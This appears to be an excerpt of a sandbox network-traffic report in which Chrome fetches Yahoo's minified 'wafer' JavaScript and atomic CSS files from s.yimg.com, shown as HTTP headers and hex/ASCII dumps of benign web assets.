                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 68 3f 4f 5b 30 5d 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 2b 4f 2e 73 6c 69 63 65 28 31 29 3a 22 22 2c 61 3d 65 5b 22 68 61 6e 64 6c 65 22 2b 72 5d 2c 6f 3d 74 2e 5f 66 65 74 63 68 4d 65 74 61 2c 73 3d 76 6f 69 64 20 30 3d 3d 3d 6f 3f 7b 7d 3a 6f 2c 68 3d 6e 28 74 2c 5b 22 5f 66 65 74 63 68 4d 65 74 61 22 5d 29 2c 62 3d 73 2e 64 75 72 61 74 69 6f 6e 2c 41 3d 73 2e 73 6f 75 72 63 65 2c 54 3d 76 6f 69 64 20 30 3b 69 66 28 69 26 26 28 75 7c 7c 63 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 70 2e 72 65 70 6c 61 63 65 28 22 2e 22 2c 22 22 29 29 2c 64 26 26 64 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 61 73 2d 77 61 66 65 72 2d 66 65 74 63 68 2d 65 72 72 6f 72 22 2c 22 77 61 66 65 72 2d 66 65 74 63 68 2d 62 6f 75 6e 64 61 72 79 2d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: h?O[0].toUpperCase()+O.slice(1):"",a=e["handle"+r],o=t._fetchMeta,s=void 0===o?{}:o,h=n(t,["_fetchMeta"]),b=s.duration,A=s.source,T=void 0;if(i&&(u||c.classList.remove(p.replace(".","")),d&&d.classList.remove("has-wafer-fetch-error","wafer-fetch-boundary-
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 6f 6e 3a 62 2c 73 6f 75 72 63 65 3a 41 2c 74 61 72 67 65 74 45 6c 65 6d 3a 54 7c 7c 53 2c 75 72 6c 3a 6a 7d 7d 29 2c 21 30 7d 7d 29 2e 63 61 74 63 68 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 65 2e 5f 64 65 73 74 72 6f 79 65 64 29 7b 76 61 72 20 72 3d 74 7c 7c 7b 7d 2c 6e 3d 72 2e 6d 65 73 73 61 67 65 3b 69 66 28 6a 3d 65 2e 5f 75 74 69 6c 2e 75 72 6c 2c 2b 2b 6f 2c 22 4e 6f 74 20 66 6f 75 6e 64 22 21 3d 3d 6e 26 26 62 26 26 6f 3c 62 29 72 65 74 75 72 6e 20 65 2e 5f 73 74 61 74 65 2e 73 74 61 74 75 73 3d 32 2c 63 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 77 66 2d 73 65 73 73 69 6f 6e 2d 72 65 74 72 79 2d 63 6f 75 6e 74 65 72 22 2c 6f 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 66 65 74 63 68 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: on:b,source:A,targetElem:T||S,url:j}}),!0}}).catch(function(t){if(!e._destroyed){var r=t||{},n=r.message;if(j=e._util.url,++o,"Not found"!==n&&b&&o<b)return e._state.status=2,c.setAttribute("data-wf-session-retry-counter",o),setTimeout(function(){e.fetch(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 65 61 64 7c 7c 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 3b 76 61 72 20 74 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 68 65 61 64 3b 5f 28 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 73 63 72 69 70 74 22 29 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 29 7c 7c 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 2c 6e 3d 65 2e 69 6e 6e 65 72 54 65 78 74 3b 6e 26 26 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3d 3d 3d 72 26 26 28 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2c 45 28 7b 63 68 65 63 6b 50 61 67 65 46 6f 72 53 63 72 69 70 74 3a 21 30 2c 74 79 70 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ead||document.getElementsByTagName("head")[0];var t=this._util.head;_(e.querySelectorAll("script")).forEach(function(e){var r=e.getAttribute("type")||"text/javascript",n=e.innerText;n&&"text/javascript"===r&&(t.appendChild(e),E({checkPageForScript:!0,type


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    140192.168.2.44990187.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC625OUTGET /aaq/fp/css/react-wafer-weather.WeatherPreviewRefresh.atomic.ltr.2a251a0ddb3d7c4ec13f4e35ee35dd2b.min.css HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC706INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: F5dIaziM/WCRSJ+wB9u3/6MsFDsTnvDRg2knlkxr9U83u7TSBIHL0g89M8fXgcIUT9CqrT+v/cA=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: 61F00Y936A63HHFA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Sun, 29 Sep 2024 07:42:21 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Fri, 15 Dec 2023 14:53:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "2a251a0ddb3d7c4ec13f4e35ee35dd2b"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: kLRcmlvLyRbY_VAaft68F.xlsYWQ5D50
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 5570
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 121125
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 23 61 74 6f 6d 69 63 20 2e 41 69 5c 28 63 5c 29 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 23 61 74 6f 6d 69 63 20 2e 42 64 63 5c 28 2d 2d 64 69 72 74 79 2d 73 65 61 67 75 6c 6c 5c 29 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 65 30 65 34 65 39 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 64 69 72 74 79 2d 73 65 61 67 75 6c 6c 29 7d 23 61 74 6f 6d 69 63 20 2e 42 64 63 5c 28 2d 2d 70 65 62 62 6c 65 5c 29 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 63 37 63 64 64 32 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 70 65 62 62 6c 65 29 7d 23 61 74 6f 6d 69 63 20 2e 42 64 63 5c 28 74 5c 29 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 23 61 74 6f 6d 69 63 20 2e 42 64 74 63 5c 28 2d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: #atomic .Ai\(c\){align-items:center}#atomic .Bdc\(--dirty-seagull\){border-color:#e0e4e9;border-color:var(--dirty-seagull)}#atomic .Bdc\(--pebble\){border-color:#c7cdd2;border-color:var(--pebble)}#atomic .Bdc\(t\){border-color:transparent}#atomic .Bdtc\(-
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 7d 23 61 74 6f 6d 69 63 20 2e 42 78 7a 5c 28 62 62 5c 29 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 23 61 74 6f 6d 69 63 20 2e 42 78 73 68 5c 28 6e 5c 29 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 7d 23 61 74 6f 6d 69 63 20 2e 43 5c 28 2d 2d 62 61 74 63 61 76 65 5c 29 7b 63 6f 6c 6f 72 3a 23 32 33 32 61 33 31 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 61 74 63 61 76 65 29 7d 23 61 74 6f 6d 69 63 20 2e 43 5c 28 2d 2d 62 6c 61 63 6b 5c 29 2c 23 61 74 6f 6d 69 63 20 2e 43 5c 28 2d 2d 62 6c 61 63 6b 5c 29 5c 3a 5c 3a 70 68 3a 3a 70 6c 61 63 65 68 6f 6c 64 65 72 7b 63 6f 6c 6f 72 3a 23 30 30 30 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 6c 61 63 6b 29 7d 23 61 74 6f 6d 69 63 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: d-repeat:no-repeat}#atomic .Bxz\(bb\){box-sizing:border-box}#atomic .Bxsh\(n\){box-shadow:none}#atomic .C\(--batcave\){color:#232a31;color:var(--batcave)}#atomic .C\(--black\),#atomic .C\(--black\)\:\:ph::placeholder{color:#000;color:var(--black)}#atomic
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 23 61 74 6f 6d 69 63 20 2e 46 77 5c 28 32 30 30 5c 29 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 32 30 30 7d 23 61 74 6f 6d 69 63 20 2e 46 77 5c 28 35 30 30 5c 29 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 23 61 74 6f 6d 69 63 20 2e 46 77 5c 28 36 30 30 5c 29 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 7d 23 61 74 6f 6d 69 63 20 2e 46 7a 5c 28 31 32 70 78 5c 29 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 7d 23 61 74 6f 6d 69 63 20 2e 46 7a 5c 28 31 33 70 78 5c 29 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 7d 23 61 74 6f 6d 69 63 20 2e 46 7a 5c 28 31 34 70 78 5c 29 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 23 61 74 6f 6d 69 63 20 2e 46 7a 5c 28 31 65 6d 5c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: stify-content:space-between}#atomic .Fw\(200\){font-weight:200}#atomic .Fw\(500\){font-weight:500}#atomic .Fw\(600\){font-weight:600}#atomic .Fz\(12px\){font-size:12px}#atomic .Fz\(13px\){font-size:13px}#atomic .Fz\(14px\){font-size:14px}#atomic .Fz\(1em\
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 5c 29 7b 70 61 64 64 69 6e 67 3a 30 7d 23 61 74 6f 6d 69 63 20 2e 50 5c 28 32 30 70 78 5c 29 7b 70 61 64 64 69 6e 67 3a 32 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 5c 28 38 70 78 5c 29 7b 70 61 64 64 69 6e 67 3a 38 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 78 5c 28 30 5c 29 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 23 61 74 6f 6d 69 63 20 2e 50 78 5c 28 30 5c 2e 34 65 6d 5c 29 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 2e 34 65 6d 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 2e 34 65 6d 7d 23 61 74 6f 6d 69 63 20 2e 50 78 5c 28 31 30 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 30 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 78 5c 28 32 30 70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: \){padding:0}#atomic .P\(20px\){padding:20px}#atomic .P\(8px\){padding:8px}#atomic .Px\(0\){padding-left:0;padding-right:0}#atomic .Px\(0\.4em\){padding-left:.4em;padding-right:.4em}#atomic .Px\(10px\){padding-left:10px;padding-right:10px}#atomic .Px\(20p
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC370INData Raw: 31 7d 23 61 74 6f 6d 69 63 20 2e 5a 5c 28 31 30 5c 29 7b 7a 2d 69 6e 64 65 78 3a 31 30 7d 2e 48 69 64 64 65 6e 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6c 69 70 3a 72 65 63 74 28 31 70 78 2c 31 70 78 2c 31 70 78 2c 31 70 78 29 3b 62 6f 72 64 65 72 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 68 65 69 67 68 74 3a 31 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 77 69 64 74 68 3a 31 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 53 74 72 65 74 63 68 65 64 42 6f 78 7b 62 6f 74 74 6f 6d 3a 30 3b 6c 65 66 74 3a 30 3b 72 69 67 68 74 3a 30 3b 74 6f 70 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 1}#atomic .Z\(10\){z-index:10}.Hidden{position:absolute!important;clip:rect(1px,1px,1px,1px);border:0!important;height:1px!important;overflow:hidden;padding:0!important;width:1px!important}.StretchedBox{bottom:0;left:0;right:0;top:0}@media screen and (max


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    141192.168.2.44991187.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC369OUTGET /aaq/wf/wf-lightbox-1.10.6-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC744INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: Um8R8vDGgUIhu77y/zyMqPVllapJnQbcwvkVGteYqsyj/IjVyaYR9YbcLknzRCIw7U1qZ9sqW28=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: JYXQ5GRVB725BYN9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Fri, 27 Sep 2024 01:33:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Wed, 01 Mar 2023 01:43:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "69831b2f7b26bc6dd6321c8dcde85968"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: K.68hs0p5c2EOJjfXuKP9dx0XBa4hSTK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 13914
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 316063
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 6c 69 67 68 74 62 6f 78 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 6c 69 67 68 74 62 6f 78 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-lightbox",[],t):"object"==typeof exports?exports["wafer-lightbox"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 74 26 26 6e 75 6c 6c 21 3d 3d 74 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 2c 20 6e 6f 74 20 22 2b 74 79 70 65 6f 66 20 74 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: {if("function"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototype
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 6f 29 2c 6e 26 26 65 28 74 2c 6e 29 2c 74 7d 7d 28 29 2c 70 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2c 66 3d 70 2e 62 61 73 65 2c 64 3d 70 2e 63 6f 6e 73 74 61 6e 74 73 2c 77 3d 70 2e 66 65 61 74 75 72 65 73 2c 62 3d 70 2e 75 74 69 6c 73 2c 79 3d 70 2e 57 61 66 65 72 42 61 73 65 43 6c 61 73 73 2c 67 3d 62 2e 62 69 6e 64 45 76 65 6e 74 2c 76 3d 62 2e 66 69 6e 64 41 6e 63 65 73 74 6f 72 2c 6d 3d 62 2e 67 65 74 46 6f 63 75 73 61 62 6c 65 45 6c 65 6d 73 2c 5f 3d 62 2e 67 65 74 54 65 6d 70 6c 61 74 65 43 6f 6e 74 65 6e 74 2c 43 3d 62 2e 72 65 6d 6f 76 65 54 72 61 6e 73 69 74 69 6f 6e 2c 78 3d 62 2e 73 65 74 54 69 6d 65 6f 75 74 2c 45 3d 62 2e 73 65 74 54 72 61 6e 73 69 74 69 6f 6e 2c 6b 3d 62 2e 75 6e 62 69 6e 64 45
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: &e(t.prototype,o),n&&e(t,n),t}}(),p=window.wafer,f=p.base,d=p.constants,w=p.features,b=p.utils,y=p.WaferBaseClass,g=b.bindEvent,v=b.findAncestor,m=b.getFocusableElems,_=b.getTemplateContent,C=b.removeTransition,x=b.setTimeout,E=b.setTransition,k=b.unbindE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 76 6f 69 64 20 30 3d 3d 3d 62 3f 30 3a 4e 75 6d 62 65 72 28 62 29 2c 6b 65 79 3a 64 2c 73 65 6c 65 63 74 6f 72 3a 61 2c 73 75 63 63 65 73 73 43 6c 61 73 73 3a 69 2c 74 61 72 67 65 74 3a 66 2c 74 72 69 67 67 65 72 3a 77 2c 77 72 61 70 70 65 72 4d 61 70 3a 63 7d 2c 6d 26 26 28 68 2e 5f 75 74 69 6c 2e 70 61 67 65 54 61 72 67 65 74 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 6d 29 29 2c 68 2e 5f 73 74 61 74 65 3d 75 28 7b 63 6f 6e 74 65 6e 74 4f 62 73 65 72 76 65 72 3a 6e 75 6c 6c 2c 66 69 72 73 74 46 6f 63 75 73 61 62 6c 65 45 6c 65 6d 3a 6e 75 6c 6c 2c 6c 61 73 74 46 6f 63 75 73 61 62 6c 65 45 6c 65 6d 3a 6e 75 6c 6c 2c 74 6f 75 63 68 65 6e 64 59 3a 30 2c 74 6f 75 63 68 73 74 61 72 74 59 3a 30 2c 77 69 6c 6c 43 6c 6f 73 65 3a 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: void 0===b?0:Number(b),key:d,selector:a,successClass:i,target:f,trigger:w,wrapperMap:c},m&&(h._util.pageTarget=document.querySelector(m)),h._state=u({contentObserver:null,firstFocusableElem:null,lastFocusableElem:null,touchendY:0,touchstartY:0,willClose:n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 72 20 79 3d 62 3d 22 77 61 66 65 72 2d 6c 69 67 68 74 62 6f 78 2d 6c 61 62 65 6c 2d 22 2b 44 61 74 65 2e 6e 6f 77 28 29 3b 64 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 79 29 7d 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 22 2c 62 29 7d 73 26 26 28 70 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 77 61 66 65 72 2d 6c 69 67 74 68 62 6f 78 2d 73 6f 75 72 63 65 2d 22 2b 73 29 2c 4d 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 77 61 66 65 72 2d 6c 69 67 74 68 62 6f 78 2d 73 6f 75 72 63 65 2d 22 2b 73 2b 22 2d 6f 70 65 6e 22 29 29 2c 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 6d 6f 64 61 6c 22 2c 21 30 29 2c 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 72 6f 6c 65 22 2c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: r y=b="wafer-lightbox-label-"+Date.now();d.setAttribute("id",y)}p.setAttribute("aria-labelledby",b)}s&&(p.classList.add("wafer-ligthbox-source-"+s),M.classList.add("wafer-ligthbox-source-"+s+"-open")),p.setAttribute("aria-modal",!0),p.setAttribute("role",
